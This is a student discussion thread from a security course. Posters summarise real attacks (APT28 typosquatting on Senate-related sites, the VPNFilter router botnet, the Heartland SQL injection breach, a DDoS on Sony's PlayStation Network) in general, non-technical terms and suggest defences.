A “hacker” can be an individual using their skills on behalf of an organization, testing security controls so that a non-authorized party does not obtain information and/or take systems offline. One could argue that the “ethical hacker” working for your organization is a “white hat”, and the non-authorized party is a “black hat.”
Research a recent attack on an organization that is directly attributed to some sort of “black hat” type of attack. Write a reply to this blog post:
- Who was affected?
- How were they affected?
- Were there after-effects?
- What type of attack was used?
- Who was the attacking party?
- Could/Should an internal team have put measures in place to prevent the attack, or reduce the impact?
Dan Bilenker says
US Senate & Conservative Think-tanks the Hudson Institute and the International Republican Institute almost fell victim to an unsuccessful domain squatting attempt.
Russian Government sponsored hackers created six fake websites related to US senate and conservative think tanks to trick visitors and execute malicious code. Three fake websites domains were used to mimic US Senate websites, and one fake domain was used to mimic Microsoft’s products. Additionally two more fake domains were designed to dupe visitors into thinking they belonged to US conservative organizations.
The two organizations involved were the Hudson Institute, a think-tank hosting extended discussions on topics including Cybersecurity (ironic, much), among other activities. The second organization was the International Republican Institute, a nonprofit group that promotes democracy worldwide. The organization has several notable members including the late Senator John McCain, and former RNC chairman Frank Fahrenkopf.
Fortunately, evidence suggests the hackers were unsuccessful in luring visitors to the fake websites. However, Microsoft confirmed that the sites were created over the last several months, and registered with major web hosting companies.
The attacks appear to be an attempt at Domain Squatting. Domain squatting is the practice of purchasing domain names that are similar to the intended URL, in an attempt to capitalize on typos of users searching for specific pages. Additionally, the resulting pages, and related URL’s were intended to mimic authentic page URL’s, and lure unsuspecting visitors. The pseudo-pages were built to replicate authentic pages in aesthetic and function.
Preliminary intelligence gathered by Microsoft suggests that the attacks were perpetrated by APT28, an organization believed to be tied to the Russian Government’s General Staff Main Intelligence Directorate (GRU), an arm of the Russian Military Intelligence branch. The group has a plethora of pseudonyms it also operates under, including Strontium, Fancy Bear, Sofacy, Sednit, and Pawn Storm.
Domain Squatting is a difficult type of attack to defend as it is costly, and unfeasible to own all the possible permutations of a URL. What is more concerning here, is the lack of oversight on behalf of the web-hosting companies. Those domain names were easily identifiable, given the high profile of the sites they were designed to mimic. The web-hosting companies failed to perform due diligence in cross referencing the URL’s before authorizing their purchase.
Source: https://thehackernews.com/2018/08/air-canada-data-breach.html
Dan Bilenker says
My apologies regarding the link, here is the correct link:
https://thehackernews.com/2018/08/russia-election-hacking.html
Vince Kelly says
Excellent post Daniel, well written, clearly articulated, comprehensively researched and rife with intricate detail and specificity. But unfortunately your post must be classified as yet another attempt by the deep state at ‘Fake News’.
The rationale for this is clear Daniel – I’m sure that you’d agree that ‘the truth is not the truth’ and so, after ignoring overwhelming evidence from 17 different intelligence agencies to the contrary and after listening to the ‘powerful arguments and denials’ from one of this country’s greatest advisories, our ‘bigly, stable genius, “leader” ‘ has assured us that the Russian’s are simply *not* involved in any form of state sponsored hacking against US institutions or critical US infrastructure. And given his track record of unwavering truthfulness and integrity how can you POSSIBLY not believe him? And so the facts that you’ve so adroitly presented about Russian attempts at interference must be Fake News.
I think that the surreal absurdity and contradiction of a ‘leader’ who is supposed to represent the morals and principles of the people he governs but fails to do so brings up an interesting “hypothetical” scenario that has implications for all security practitioners. It goes something like this:
“Hypothetical” Scenario with Implications for Security Professionals:
Suppose that you are a CSO employed by the largest company in your industry and suppose the CEO of that company has been completely compromised by organized crime – (let’s just assume for the sake of this scenario that it’s the Russian mob). What alternatives do you have and what actions could you take if this traitorous CEO has convinced the lemmings who make up the base of his support on the board of directors that, despite specific, concrete evidence to the contrary, the mob has *not* infiltrated your company and is not actively working to completely divide and undermine it?
In other words, what if you and everyone else in the entire world, (except the lemmings of course) have some pretty compelling circumstantial evidence that the Russian mob owns not only your company but your senior management as well?
Surely this is just a scenario, and clearly it doesn’t reflect what is actually happening in the real world today but after racking my brain for the past several months, the only solution that I can come up with for this challenging ‘hypothetical’ problem is to vote in November.
Can you think of any other options? 🙂 🙂 🙂
P.S., My comments were not directed at you Daniel and I apologize if I offended – they were only intended as a bit of humorous cynicism.
Vince Kelly says
Research a recent attack on an organization that is directly attributed to some sort of “black hat” type of attack.
The Black Hat attack that I researched was ranked by Wired Magazine as among “The Worst Cybersecurity Breaches of 2018 so Far”
(see: https://arstechnica.com/information-technology/2018/06/vpnfilter-malware-infecting-50000-devices-is-worse-than-we-thought/, https://www.wired.com/story/2018-worst-hacks-so-far/, and https://www.thedailybeast.com/exclusive-fbi-seizes-control-of-russian-botnet, https://en.wikipedia.org/wiki/VPNFilter)
According to multiple reports, in May of this year, the FBI received a court order to seize a domain name and the to take control of “a key server in the Kremlin’s global botnet of 500,000 hacked routers.”
Who was affected?
Malware called “VPNFilter” infected 500,000 home office routers across 54 different countries
How where they affected?
According to Wikipedia, the malware had three stages and install itself as follows:
1. Stage 1 involves a worm which adds code to the device’s crontab (the list of tasks run at regular
intervals by the cron scheduler on Linux). This allows it to remain on the device after a reboot, and to re-
infect it with the subsequent stages if they are removed. Stage 1 uses known URLs to find and install
Stage 2 malware. If those known URLs are disabled, Stage 1 sets up a socket listener on the device and
waits to be contacted by command and control systems.[7]
2. Stage 2 is the body of the malware, including the basic code that carries out all normal functions and
executes any instructions requested by special, optional Stage 3 modules.
3. Stage 3 can be any of various “modules” that tell the malware to do specific things, like spying on
industrial control devices (Modbus SCADA) or using secure “dark web” Tor software to communicate via
encryption.[5]
Were there after-effects?
After the FBI seized the domain name “ToKnowAll.com”, and redirected the traffic to their servers, they/the FBI have been collecting the IP addresses of the infected routers so that they can then inform the owners of those compromised routers that they need to shut down/restart the routers (the FBI is not permitted to collect any content other than the IP address of an infected router). The FBI is also working with ISP’s to have them either reboot infected the routers that were part of their network or to send notifications to the home owners that they needed to reboot their boxes.
What types of attacks were used?
VPNFilter uses known vulnerabilities to infect home office routers made by Linksys, MicroTik, NETGEAR, and TP-Link. Once in place, the malware sets up a command and control channel that can install ‘purpose-built plug-ins’. One of the plugins actually lets hackers eavesdrop on the victims Internet traffic in order to steal website credentials. Other exploits that were also found included targeting a protocol used in industrial control networks like those used in the electric grid. These protocols are the Modbus and SCADA industrial control protocols. Another type of exploit allows the attacker to cripple any or all of the infected devices at will. The command and control channel is used to help the exploit reestablish itself in the event of a reboot. As a result, the FBI seized a server and a domain name called “ToKnowAll.com” which was used to ensure the persistence of the exploit.
Who was the attacking party?
The Russian hacking group known as “Fancy Bear”
Could/should an internal team have put measures in place to prevent the attack or reduce its impact?
Given that most people have trouble programming even the simplest features on most types of electronic equipment, it would be unreasonable to expect that they would be able to even understand the potential of this kind of attack or to protect themselves if they did.
Dan Bilenker says
FancyBear strikes again! But in all seriousness, our adversaries are getting all to adept at compromising our data.
Vince Kelly says
you;re right – and (apparently) we are doing very little to prevent it from occurring again. Just saw an article where Illinois state board of elections admitted that the Russians hacked into their voter registration DB and gained access to *76,000* voter records!
The famous quote describing war by Carl Von Clausewitz summed it best::
“War is not merely a political act but a real political instrument, a continuation of political intercourse, a carrying out of the same by other means.”
This has not just revived the cold war, its revived it and taken it an entirely new level (while we do nothing)
Dan Bilenker says
No offense taken, I can still detect sarcasm even through online posting – I’ll gladly take this over any of the futile Facebook arguments I’ve witnessed. Domain squatting is such a rudimentary means of hacking too. It doesn’t really require any technical knowledge, or advanced skills. It can be used in so many innocuous, or at least non malicious contexts as well.
When I was around 10, my teacher gave us an assignment to research a former president and write an essay/give a presentation.
Well, my naive 10 year old self, did not realize that all government websites have a .gov domain name. In my zeal to give the perfect presentation on George Washington, I visited http://www.whitehouse.com.
For those of you who are unaware, circa 1999, http://www.whitehouse.com was, let’s say, a website that featured individuals performing various acts most would consider inappropriate for a 10 year old. Yes, indeed we was looking for whitehouse.gov, and my first encounter with Domain Squatting coincidently also featured my first discussion of the birds and the bees.
That my friend, isn’t NOT “fake news”.
William Bailey says
Purchasing a mis-typed version of a popular website can be used for profit, or can be used to deliver malicious content. Because there was no malware delivered via whitehouse.com, I would consider them just a look-a-like site, trying to profit off of another brand’s image. There are multiple websites set up to “look like” payment websites such as paypal that are specifically trying to lure unsuspecting visitors to their site and obtain their username, password, and other information from them, or offer drive-by downloads (e.g. video “filters”) for profit.
Kelly Conger says
Just a quick addition to this. I deal with issues like this on an almost daily basis. Without going into too much detail the OCR feature on all of our company scanners doesn’t always do a great job when converting word documents to a PDF file. Many times the @domain.xyz in either our company email address or an external customers email address will insert the wrong character, for example, replacing the “i” in the word domain to an “L”, so now it reads @domaLn.xyz in the scanned PDF. This will result in a false positive “domain squatting” or “typo squatting” phishing attempt. Often these are important documents with critical time constraints. so it can be frustrating to our end users because they will have to wait until we verify the mistake and manually release their email and attachment.
Dan Bilenker says
No offense taken, I can still detect sarcasm even through online posting – I’ll gladly take this over any of the futile Facebook arguments I’ve witnessed. Domain squatting is such a rudimentary means of hacking too. It doesn’t really require any technical knowledge, or advanced skills. It can be used in so many innocuous, or at least non malicious contexts as well.
When I was around 10, my teacher gave us an assignment to research a former president and write an essay/give a presentation.
Well, my naive 10 year old self, did not realize that all government websites have a .gov domain name. In my zeal to give the perfect presentation on George Washington, I visited http://www.whitehouse.com.
For those of you who are unaware, circa 1999, http://www.whitehouse.com was, let’s say, a website that featured individuals performing various acts most would consider inappropriate for a 10 year old. Yes, indeed I was looking for whitehouse.gov, and my first encounter with Domain Squatting coincidently also featured my first discussion of the birds and the bees.
That my friend, is NOT “fake news”.
Duy Nguyen says
Heartland Payment Systems, a major payment processing company experienced a breach in 2008 and reported a loss of more than 45 million customer’s data. The company stated that card numbers, expirations dates and in some cases cardholders names we exposed. Heartland’s systems were compromised with SQL injections to installed sniffers that grabbed packets of transactions where financial data were exposed. The sniffer compromised their systems months earlier but Heartland was only alerted when suspicious activities were reported by Visa and MasterCard auditors.
SQL injections are the input of SQL commands in entry fields such as username and passwords on a login page of a website. These SQL commands are injected to attack the database, HTML, JavaScript, or XSLT. Based on the analysis, SQL injection could have been mitigating with basic parameter database queries. There are other forms of mitigations techniques for SQL injection prevention, but another basic one was a blacklist of characters with SQL meanings from the entry fields.
Another control that failed Heartland was an Intrusion Detection system. They were unaware of their exposure for months and countless packets of PII were captured, in the end, they were still unable to count the amount of data loss. Better controls and a more defined IDS process could have minimized lost and possibly avoid these attacks.
https://www.forbes.com/sites/davelewis/2015/05/31/heartland-payment-systems-suffers-data-breach/#4f763019744a
https://www.darkreading.com/attacks-and-breaches/heartland-payment-systems-hit-by-data-security-breach/d/d-id/1075770
Brandan Mackowsky says
Looking at this post reminds me of the 2014 attack on Sony’s PlayStation and Entertainment network services. While greatly impacting Sony’s ability to keep its systems and services online, a vast amount of consumers were affected as they had no access to the PlayStation network or any entertainment services. From the attack, Sony was unable to provide services to its PlayStation and entertainment networks. The attacking party were black hat hackers presumably by the names of Fame or Lizard Squad. The group supported the demand to stop bombing on the radical group, ISIS. Until their demands were met, they explained there would be no access to the networks. In order to prevent use of these systems, the hackers used a DDoS attack to disrupt the servers by overflowing the traffic. A key point to look at is could/Should an internal team have put measures in place to prevent the attack, or reduce the impact? Regarding this area, it is definitely necessary for Sony to learn from its mistakes and an internal team should be put in place to not prevent all attacks, but rather have awareness of the vulnerabilities that exist in its realm of business. By understanding where vulnerabilities lie, Sony can prepare a strategy to deal with events as soon as they occur and quickly mitigate the impact and severity of each event.